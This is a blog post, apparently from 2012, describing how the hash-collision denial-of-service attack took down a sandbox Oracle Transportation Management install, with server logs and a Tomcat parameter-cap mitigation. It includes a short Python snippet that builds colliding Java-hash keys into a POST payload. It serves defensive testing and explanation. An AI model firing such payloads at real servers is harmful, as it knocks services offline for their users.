Hash collision attacks hose Oracle Transportation Management

Ars had a great write-up a few weeks ago about the hash-collision resource-starvation attack that resurfaced recently (and when I say resurfaced, I mean the underlying research dates back to 2003).  The press has focused on a relatively small number of the affected vendors; that's not only somewhat unfair, it also leads many to assume the issue can't hit closer to home.

If you want to get past script-kiddie level and have had a basic introduction to algorithms and Big-O notation, I strongly recommend reading the Crosby-Wallach USENIX paper.  If you just want to test your own stack for the issue, however, there's a simple Python script on GitHub you can grab and fire at yourself.  I pointed it at a sandbox OTM 6.2.3 installation and, after a few sample payloads, struck gold.

INFO | 2012/02/01 17:25:11 | SEVERE: All threads (200) are currently busy, waiting. Increase maxThreads (200) or check the servlet status
INFO | 2012/02/01 17:25:33 | [INFO ][memory ] [YC#20] 682796.926-682796.970: YC 4173305KB->2485427KB (4915200KB), 0.044 s, sum of pauses 43.666 ms, longest pause 43.666 ms.
INFO | 2012/02/01 17:25:40 | Feb 1, 2012 5:25:40 PM org.apache.jk.common.ChannelSocket processConnection
INFO | 2012/02/01 17:25:40 | WARNING: processCallbacks status 2
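I won't reproduce the GitHub script here, but the core trick behind payloads like the one above is easy to sketch. Java's String.hashCode() is a simple rolling function (h = 31*h + c), and the two-character blocks "Aa" and "BB" hash identically, so any same-length concatenation of those blocks collides with every other one. Stuff a few thousand of those into one POST body and every parameter lands in the same hash bucket. A minimal illustration (function names are mine, not from the script):

```python
import itertools

def java_string_hash(s):
    """Pure-Python equivalent of Java's String.hashCode():
    h = 31*h + c, kept to 32 bits at each step."""
    h = 0
    for ch in s:
        h = (31 * h + ord(ch)) & 0xFFFFFFFF
    return h

def colliding_keys(n_pairs):
    """Build 2**n_pairs distinct strings that all share one hash value.
    "Aa" and "BB" both hash to 2112, and the hash composes block by
    block, so every combination of the two collides."""
    return ["".join(combo)
            for combo in itertools.product(("Aa", "BB"), repeat=n_pairs)]

keys = colliding_keys(10)                # 1024 distinct keys, one bucket
body = "&".join(f"{k}=x" for k in keys)  # form-encoded POST payload
```

With each request forcing O(n^2) work out of the parameter hash table, it doesn't take many concurrent posts to pin every worker thread, which is exactly what the maxThreads warning above shows.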

I let the services continue running even after the HTTP processors had died; the web/app tier never recovered gracefully.  Moral of the story: just because Oracle didn't release any notes specific to OTM doesn't mean you don't need to address the issue.
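If you can't patch right away, the stopgap most servlet containers shipped is a cap on parsed request parameters. Assuming your OTM web tier is the bundled Apache Tomcat (the org.apache.jk ChannelSocket messages in the log suggest as much), something along these lines in server.xml limits the damage; maxParameterCount exists in the patched Tomcat releases (6.0.35+/7.0.23+), and the 1000 here is an illustrative value, not an Oracle recommendation:

```
<!-- server.xml: cap the number of request parameters Tomcat will parse.
     Requests beyond the cap are truncated instead of feeding the
     collision-prone hash table indefinitely. -->
<Connector port="8009" protocol="AJP/1.3"
           maxParameterCount="1000" />
```

It's a blunt instrument, and you'd want to confirm OTM itself never legitimately posts more parameters than your cap before rolling it out.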